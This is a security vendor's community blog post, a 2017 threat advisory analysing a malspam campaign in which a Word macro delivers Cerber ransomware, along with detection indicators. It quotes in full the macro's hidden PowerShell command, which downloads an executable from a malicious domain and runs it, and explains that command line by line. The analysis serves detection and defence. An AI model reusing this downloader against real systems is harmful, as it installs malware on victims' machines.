This website uses cookies. By clicking Accept, you consent to the use of cookies. Click Here to learn more about how we use cookies.
Accept
Reject
Register Now
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
NetWitness Community Blog
Subscribe to the official NetWitness Community blog for information about new product features, industry insights, best practices, and more.
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Malspam Delivers Cerber Ransomware July-2017

RajasSave
Respected Contributor Respected Contributor
Respected Contributor
‎2017-07-21 02:44 PM

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.

doc_2.jpg

VT_1.PNG

Submitting the delivery document to What's This File service shows more information about the malicious word document.

Capture1.JPG

This activity and more is also captured in the process tree below shows the series of events that led to downloading and executing a Cerber payload:

bhavanan.PNG

The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

Line-By-Line analysis of PowerShell Command:

powershell.exe

  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods,which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = ‘http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + ‘\’ + $name + ‘.exe’;

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;}break;}

  • Executing downloaded fine and if the command failed to return a process and continued silently, the window remains hidden and the process breaks.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.

 

In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe". It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.   

 

recons1.PNG

droped files.PNG

final_payload.PNG

 

VirusTotal analysis of the dropped file confirm it’s Cerber Ransomware:

 

vtcerber2.PNG

 

Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.

 

udpsprauy.PNG

 

Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 

 

cerber ransonmwae.PNG

 

Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.

 

hunting22.PNG

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, Please check the following RSA Link articles:

 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

FirstWatch_banner.png

References:

© 2022 RSA Security LLC or its affiliates. All rights reserved.